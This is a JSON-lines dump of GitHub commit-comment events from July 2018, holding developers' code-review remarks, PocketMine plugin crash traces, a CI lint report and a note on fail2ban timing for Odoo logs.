{"id":"7922464174","type":"CommitCommentEvent","actor":{"login":"lemmy"},"repo":{"name":"tlaplus/tlaplus"},"payload":{"comment":{"id":29604692,"position":null,"line":null,"path":null,"commit_id":"642b540e0d479867ec73c202795106ed5ed9454a","created_at":"2018-07-05T10:54:37Z","updated_at":"2018-07-05T10:54:37Z","author_association":"MEMBER","body":"![translatepcalautomatically-642b540e0d479867ec73c202795106ed5ed9454a](https://user-images.githubusercontent.com/88777/42319531-cc8d9afa-8041-11e8-91e9-3b4656243e4f.gif)\r\n"}},"created_at":"2018-07-05T10:54:37Z"}
{"id":"7922469155","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"jasonwynn10/MiniBosses"},"payload":{"comment":{"id":29604698,"position":null,"line":null,"path":null,"commit_id":"a1571bd43fcec3e8a963e5cc2a012d0985849eb9","created_at":"2018-07-05T10:55:34Z","updated_at":"2018-07-05T10:55:34Z","author_association":"NONE","body":"@jasonwynn10 \r\n\r\nhere an issue \r\nthere is no issue button on top \r\n\r\nthanks\r\n\r\n```\r\n2018-07-05 [10:43:02] [Server thread/CRITICAL]: Could not pass event 'pocketmine\\event\\player\\PlayerJoinEvent' to 'VPNGuard v1.0.6-fiber1': Call to undefined method pocketmine\\Server::getScheduler() on basprohop\\VPNGuard\r\n2018-07-05 [10:43:02] [Server thread/CRITICAL]: Error: \"Call to undefined method pocketmine\\Server::getScheduler()\" (EXCEPTION) in \"VPNGuard_dev-14.phar/src/basprohop/VPNGuard\" at line 90\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #0 src/pocketmine/plugin/MethodEventExecutor(38): basprohop\\VPNGuard->onPlayerLogin(pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #1 src/pocketmine/plugin/RegisteredListener(98): pocketmine\\plugin\\MethodEventExecutor->execute(basprohop\\VPNGuard object, pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #2 src/pocketmine/plugin/PluginManager(756): pocketmine\\plugin\\RegisteredListener->callEvent(pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #3 src/pocketmine/Player(1029): pocketmine\\plugin\\PluginManager->callEvent(pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #4 src/pocketmine/Player(977): pocketmine\\Player->doFirstSpawn()\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #5 src/pocketmine/level/Level(2462): pocketmine\\Player->sendChunk(integer 15, integer 9, pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #6 src/pocketmine/level/Level(2481): pocketmine\\level\\Level->sendChunkFromCache(integer 15, integer 9)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #7 src/pocketmine/level/Level(793): pocketmine\\level\\Level->processChunkRequest()\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #8 src/pocketmine/Server(2356): pocketmine\\level\\Level->doTick(integer 3919)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #9 src/pocketmine/Server(2511): pocketmine\\Server->checkTickUpdates(integer 3919, double 1530780182.8325)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #10 src/pocketmine/Server(2255): pocketmine\\Server->tick()\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #11 src/pocketmine/Server(2129): pocketmine\\Server->tickProcessor()\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #12 src/pocketmine/Server(1710): pocketmine\\Server->start()\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #13 src/pocketmine/PocketMine(237): pocketmine\\Server->__construct(BaseClassLoader object, pocketmine\\utils\\MainLogger object, string /home/myservertest/, string /home/myservertest/plugins/)\r\n2018-07-05 [10:43:02] [Server thread/DEBUG]: #14 /home/myservertest/PocketMine-MP.phar(1): require(string phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/PocketMine.php)\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-05T10:55:34Z"}
{"id":"7922471950","type":"CommitCommentEvent","actor":{"login":"varkor"},"repo":{"name":"varkor/rust"},"payload":{"comment":{"id":29604701,"position":15,"line":393,"path":"src/librustc/hir/mod.rs","commit_id":"3f16739edeb8c9bb2b3228b682e0e5f1039f1c17","created_at":"2018-07-05T10:56:08Z","updated_at":"2018-07-05T10:56:08Z","author_association":"OWNER","body":"Maybe it's more convenient like this, actually. Let's leave it like this for now."}},"created_at":"2018-07-05T10:56:08Z"}
{"id":"7922476207","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"jasonwynn10/MiniBosses"},"payload":{"comment":{"id":29604705,"position":null,"line":null,"path":null,"commit_id":"a1571bd43fcec3e8a963e5cc2a012d0985849eb9","created_at":"2018-07-05T10:57:04Z","updated_at":"2018-07-05T10:57:04Z","author_association":"NONE","body":"@jasonwynn10 \r\nanother issue\r\nthanks\r\n\r\n```\r\n2018-07-05 [11:26:27] [Server thread/CRITICAL]: Unhandled exception executing command 'minibosses create 55 test' in minibosses: Argument 2 passed to pocketmine\\entity\\DataPropertyManager::setFloat() must be of the type float, null given, called in phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/entity/Entity.php on line 538\r\n2018-07-05 [11:26:27] [Server thread/CRITICAL]: TypeError: \"Argument 2 passed to pocketmine\\entity\\DataPropertyManager::setFloat() must be of the type float, null given, called in phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/entity/Entity.php on line 538\" (EXCEPTION) in \"src/pocketmine/entity/DataPropertyManager\" at line 115\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #0 src/pocketmine/entity/Entity(538): pocketmine\\entity\\DataPropertyManager->setFloat(integer 53, NULL )\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #1 MiniBosses_dev-2.phar/src/MiniBosses/Boss(54): pocketmine\\entity\\Entity->__construct(pocketmine\\level\\Level object, pocketmine\\nbt\\tag\\CompoundTag object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #2 src/pocketmine/entity/Entity(288): MiniBosses\\Boss->__construct(pocketmine\\level\\Level object, pocketmine\\nbt\\tag\\CompoundTag object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #3 MiniBosses_dev-2.phar/src/MiniBosses/Main(129): pocketmine\\entity\\Entity::createEntity(string Boss, pocketmine\\level\\Level object, pocketmine\\nbt\\tag\\CompoundTag object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #4 MiniBosses_dev-2.phar/src/MiniBosses/Main(54): MiniBosses\\Main->spawnBoss(string test)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #5 src/pocketmine/command/PluginCommand(58): MiniBosses\\Main->onCommand(pocketmine\\Player object, pocketmine\\command\\PluginCommand object, string minibosses, array Array())\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #6 src/pocketmine/command/SimpleCommandMap(258): pocketmine\\command\\PluginCommand->execute(pocketmine\\Player object, string minibosses, array Array())\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #7 src/pocketmine/Server(1955): pocketmine\\command\\SimpleCommandMap->dispatch(pocketmine\\Player object, string minibosses create 55 test)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #8 src/pocketmine/Player(2190): pocketmine\\Server->dispatchCommand(pocketmine\\Player object, string minibosses create 55 test)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #9 src/pocketmine/network/mcpe/PlayerNetworkSessionAdapter(222): pocketmine\\Player->chat(string /minibosses create 55 test)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #10 src/pocketmine/network/mcpe/protocol/CommandRequestPacket(54): pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter->handleCommandRequest(pocketmine\\network\\mcpe\\protocol\\CommandRequestPacket object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #11 src/pocketmine/network/mcpe/PlayerNetworkSessionAdapter(92): pocketmine\\network\\mcpe\\protocol\\CommandRequestPacket->handle(pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #12 src/pocketmine/network/mcpe/protocol/BatchPacket(114): pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter->handleDataPacket(pocketmine\\network\\mcpe\\protocol\\CommandRequestPacket object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #13 src/pocketmine/network/mcpe/PlayerNetworkSessionAdapter(92): pocketmine\\network\\mcpe\\protocol\\BatchPacket->handle(pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #14 src/pocketmine/Player(3036): pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter->handleDataPacket(pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #15 src/pocketmine/network/mcpe/RakLibInterface(158): pocketmine\\Player->handleDataPacket(pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #16 vendor/pocketmine/raklib/src/server/ServerHandler(98): pocketmine\\network\\mcpe\\RakLibInterface->handleEncapsulated(string xxx.xxx.xxx.x 1088, raklib\\protocol\\EncapsulatedPacket object, integer 0)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #17 src/pocketmine/network/mcpe/RakLibInterface(103): raklib\\server\\ServerHandler->handlePacket()\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #18 src/pocketmine/network/Network(94): pocketmine\\network\\mcpe\\RakLibInterface->process()\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #19 src/pocketmine/network/mcpe/RakLibInterface(80): pocketmine\\network\\Network->processInterface(pocketmine\\network\\mcpe\\RakLibInterface object)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #20 vendor/pocketmine/snooze/src/SleeperHandler(120): pocketmine\\network\\mcpe\\RakLibInterface->pocketmine\\network\\mcpe\\{closure}()\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #21 vendor/pocketmine/snooze/src/SleeperHandler(82): pocketmine\\snooze\\SleeperHandler->processNotifications()\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #22 src/pocketmine/Server(2258): pocketmine\\snooze\\SleeperHandler->sleepUntil(double 1530782787.48)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #23 src/pocketmine/Server(2129): pocketmine\\Server->tickProcessor()\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #24 src/pocketmine/Server(1710): pocketmine\\Server->start()\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #25 src/pocketmine/PocketMine(237): pocketmine\\Server->__construct(BaseClassLoader object, pocketmine\\utils\\MainLogger object, string /home/myservertest/, string /home/myservertest/plugins/)\r\n2018-07-05 [11:26:27] [Server thread/DEBUG]: #26 /home/myservertest/PocketMine-MP.phar(1): require(string phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/PocketMine.php)\r\n2018-07-05 [11:26:41] [Server thread/CRITICAL]: Unhandled exception executing command 'minibosses spawn test' in minibosses: Argument 2 passed to pocketmine\\entity\\DataPropertyManager::setFloat() must be of the type float, null given, called in phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/entity/Entity.php on line 538\r\n2018-07-05 [11:26:41] [Server thread/CRITICAL]: TypeError: \"Argument 2 passed to pocketmine\\entity\\DataPropertyManager::setFloat() must be of the type float, null given, called in phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/entity/Entity.php on line 538\" (EXCEPTION) in \"src/pocketmine/entity/DataPropertyManager\" at line 115\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #0 src/pocketmine/entity/Entity(538): pocketmine\\entity\\DataPropertyManager->setFloat(integer 53, NULL )\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #1 MiniBosses_dev-2.phar/src/MiniBosses/Boss(54): pocketmine\\entity\\Entity->__construct(pocketmine\\level\\Level object, pocketmine\\nbt\\tag\\CompoundTag object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #2 src/pocketmine/entity/Entity(288): MiniBosses\\Boss->__construct(pocketmine\\level\\Level object, pocketmine\\nbt\\tag\\CompoundTag object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #3 MiniBosses_dev-2.phar/src/MiniBosses/Main(129): pocketmine\\entity\\Entity::createEntity(string Boss, pocketmine\\level\\Level object, pocketmine\\nbt\\tag\\CompoundTag object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #4 MiniBosses_dev-2.phar/src/MiniBosses/Main(63): MiniBosses\\Main->spawnBoss(string test)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #5 src/pocketmine/command/PluginCommand(58): MiniBosses\\Main->onCommand(pocketmine\\Player object, pocketmine\\command\\PluginCommand object, string minibosses, array Array())\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #6 src/pocketmine/command/SimpleCommandMap(258): pocketmine\\command\\PluginCommand->execute(pocketmine\\Player object, string minibosses, array Array())\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #7 src/pocketmine/Server(1955): pocketmine\\command\\SimpleCommandMap->dispatch(pocketmine\\Player object, string minibosses spawn test)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #8 src/pocketmine/Player(2190): pocketmine\\Server->dispatchCommand(pocketmine\\Player object, string minibosses spawn test)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #9 src/pocketmine/network/mcpe/PlayerNetworkSessionAdapter(222): pocketmine\\Player->chat(string /minibosses spawn test)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #10 src/pocketmine/network/mcpe/protocol/CommandRequestPacket(54): pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter->handleCommandRequest(pocketmine\\network\\mcpe\\protocol\\CommandRequestPacket object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #11 src/pocketmine/network/mcpe/PlayerNetworkSessionAdapter(92): pocketmine\\network\\mcpe\\protocol\\CommandRequestPacket->handle(pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #12 src/pocketmine/network/mcpe/protocol/BatchPacket(114): pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter->handleDataPacket(pocketmine\\network\\mcpe\\protocol\\CommandRequestPacket object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #13 src/pocketmine/network/mcpe/PlayerNetworkSessionAdapter(92): pocketmine\\network\\mcpe\\protocol\\BatchPacket->handle(pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #14 src/pocketmine/Player(3036): pocketmine\\network\\mcpe\\PlayerNetworkSessionAdapter->handleDataPacket(pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #15 src/pocketmine/network/mcpe/RakLibInterface(158): pocketmine\\Player->handleDataPacket(pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #16 vendor/pocketmine/raklib/src/server/ServerHandler(98): pocketmine\\network\\mcpe\\RakLibInterface->handleEncapsulated(string xxx.xxx.xxx.x 1088, raklib\\protocol\\EncapsulatedPacket object, integer 0)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #17 src/pocketmine/network/mcpe/RakLibInterface(103): raklib\\server\\ServerHandler->handlePacket()\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #18 src/pocketmine/network/Network(94): pocketmine\\network\\mcpe\\RakLibInterface->process()\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #19 src/pocketmine/network/mcpe/RakLibInterface(80): pocketmine\\network\\Network->processInterface(pocketmine\\network\\mcpe\\RakLibInterface object)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #20 vendor/pocketmine/snooze/src/SleeperHandler(120): pocketmine\\network\\mcpe\\RakLibInterface->pocketmine\\network\\mcpe\\{closure}()\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #21 vendor/pocketmine/snooze/src/SleeperHandler(82): pocketmine\\snooze\\SleeperHandler->processNotifications()\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #22 src/pocketmine/Server(2258): pocketmine\\snooze\\SleeperHandler->sleepUntil(double 1530782801.73)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #23 src/pocketmine/Server(2129): pocketmine\\Server->tickProcessor()\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #24 src/pocketmine/Server(1710): pocketmine\\Server->start()\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #25 src/pocketmine/PocketMine(237): pocketmine\\Server->__construct(BaseClassLoader object, pocketmine\\utils\\MainLogger object, string /home/myservertest/, string /home/myservertest/plugins/)\r\n2018-07-05 [11:26:41] [Server thread/DEBUG]: #26 /home/myservertest/PocketMine-MP.phar(1): require(string phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/PocketMine.php)\r\n```\r\n\r\n\r\n"}},"created_at":"2018-07-05T10:57:04Z"}
{"id":"7922476692","type":"CommitCommentEvent","actor":{"login":"odony"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29604706,"position":null,"line":null,"path":null,"commit_id":"86ffb549bf80b054f8bb5131c52d3e7757accb29","created_at":"2018-07-05T10:57:11Z","updated_at":"2018-07-05T10:57:11Z","author_association":"CONTRIBUTOR","body":"Watch out with the `findtime` here, as Odoo logs contain UTC timestamps, while `fail2ban` uses local time. You need to take into account the offset from UTC to the `findtime` if it is positive. For example if your timezone is at UTC+02:00 (7200 seconds), your findtime of `60` needs to become at least `7260`.\r\nGenerally, making the findtime large is not a problem, as a brute-force attempt swill generate hundreds or thousands of failed attempts, orders of magnitude more than a normal user would be able to cause over several days."}},"created_at":"2018-07-05T10:57:11Z"}
{"id":"7922478187","type":"CommitCommentEvent","actor":{"login":"zebragg"},"repo":{"name":"zebragg/MyHttp"},"payload":{"comment":{"id":29604707,"position":4,"line":5,"path":"README.md","commit_id":"bec6a47aacf1371b13a3e4198050fb601d81d6aa","created_at":"2018-07-05T10:57:30Z","updated_at":"2018-07-05T10:57:30Z","author_association":"OWNER","body":"TEST"}},"created_at":"2018-07-05T10:57:30Z"}
{"id":"7922479197","type":"CommitCommentEvent","actor":{"login":"BrynWyn"},"repo":{"name":"BrynWyn/DeploymentTool"},"payload":{"comment":{"id":29604711,"position":null,"line":null,"path":null,"commit_id":"8ac31b7d2548c4967b6dbe8a449beeb3281498ed","created_at":"2018-07-05T10:57:44Z","updated_at":"2018-07-05T10:57:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Folder Structure](https://trello.com/c/wy0l2uRp/1-create-folder-structure)"}},"created_at":"2018-07-05T10:57:44Z"}
{"id":"7922482894","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29604719,"position":58,"line":58,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T10:58:35Z","updated_at":"2018-07-05T10:58:35Z","author_association":"CONTRIBUTOR","body":"itemstack?"}},"created_at":"2018-07-05T10:58:35Z"}
{"id":"7922483142","type":"CommitCommentEvent","actor":{"login":"kostrzewa"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604720,"position":47,"line":302,"path":"include/DilutedFactor.h","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T10:58:38Z","updated_at":"2018-07-05T10:58:38Z","author_association":"COLLABORATOR","body":"The question was intended to ask implicitly why a static_cast above but not here.."}},"created_at":"2018-07-05T10:58:38Z"}
{"id":"7922483708","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29604721,"position":null,"line":null,"path":null,"commit_id":"989bf6dc5e333791d5e64916be0cd49d026a71c2","created_at":"2018-07-05T10:58:45Z","updated_at":"2018-07-05T10:58:45Z","author_association":"COLLABORATOR","body":"Also see {Issue 680](https://github.com/weidai11/cryptopp/issues/680)."}},"created_at":"2018-07-05T10:58:45Z"}
{"id":"7922485939","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29604726,"position":null,"line":null,"path":null,"commit_id":"f5e6bf1c9a8f6d26adab2ba5bd9adcbd4920adad","created_at":"2018-07-05T10:59:15Z","updated_at":"2018-07-05T10:59:15Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/40737375/42319760-ea2627b0-8020-11e8-8199-57c43f50862f.png)\r\n"}},"created_at":"2018-07-05T10:59:15Z"}
{"id":"7922489120","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29604728,"position":null,"line":null,"path":null,"commit_id":"f5e6bf1c9a8f6d26adab2ba5bd9adcbd4920adad","created_at":"2018-07-05T10:59:56Z","updated_at":"2018-07-05T10:59:56Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/40737375/42319790-036effda-8021-11e8-88a1-c9af346b0bc7.png)\r\n"}},"created_at":"2018-07-05T10:59:56Z"}
{"id":"7922501470","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29604755,"position":null,"line":null,"path":null,"commit_id":"ed81b4099b8be6460a4a1649c5264dc9e706ce9a","created_at":"2018-07-05T11:02:30Z","updated_at":"2018-07-05T11:02:30Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/28/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T11:02:30Z"}
{"id":"7922506716","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29604768,"position":null,"line":null,"path":null,"commit_id":"b9581ea55dc581ac41959a65def47eb9fd607838","created_at":"2018-07-05T11:03:38Z","updated_at":"2018-07-05T11:03:38Z","author_association":"NONE","body":"Unfortunately, this commit does not solve the problem of editing Sculpt's config files.\r\n\r\nI also observed another issue: When doing an `ls /config`, the initial content does not show up. Only the files that are written to the ram are visible. I still can open the files when I know their names (like /config/nitpicker).\r\n\r\nMaybe, as an interim solution before re-approaching the cow-plugin completely, it would make sense to just mirror the complete rom content into the ram once at startup time? This would also solve the semantics for deleting files in the ram. Granted, this is then no longer a copy-on-write mechanism but it would at satisfy my needs in sculpt. "}},"created_at":"2018-07-05T11:03:38Z"}
{"id":"7922515677","type":"CommitCommentEvent","actor":{"login":"maowerner"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604786,"position":47,"line":302,"path":"include/DilutedFactor.h","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T11:05:42Z","updated_at":"2018-07-05T11:05:42Z","author_association":"COLLABORATOR","body":"We just forgot it. There is no reason to write it above ;) \r\n\r\nI fixed this now."}},"created_at":"2018-07-05T11:05:42Z"}
{"id":"7922521760","type":"CommitCommentEvent","actor":{"login":"andreevrepo"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29604798,"position":16,"line":121,"path":"src/main/java/com/ewp/crm/controllers/rest/StatusRestController.java","commit_id":"15612ffeb52df8e5c8abab1e6d2114222948b3d4","created_at":"2018-07-05T11:07:05Z","updated_at":"2018-07-05T11:07:05Z","author_association":"COLLABORATOR","body":"Исправил, апдейтить можно и одну сущность, другая тоже будет обновлена.\r\n"}},"created_at":"2018-07-05T11:07:05Z"}
{"id":"7922524512","type":"CommitCommentEvent","actor":{"login":"dyatlov"},"repo":{"name":"uNetworking/uWebSockets-bindings"},"payload":{"comment":{"id":29604808,"position":null,"line":null,"path":null,"commit_id":"95e44dba351ed8e6d91aa559d4bb9bb539e1c681","created_at":"2018-07-05T11:07:41Z","updated_at":"2018-07-05T11:07:41Z","author_association":"NONE","body":"`addon.cpp` still has reference to http.h and uses it's methods."}},"created_at":"2018-07-05T11:07:41Z"}
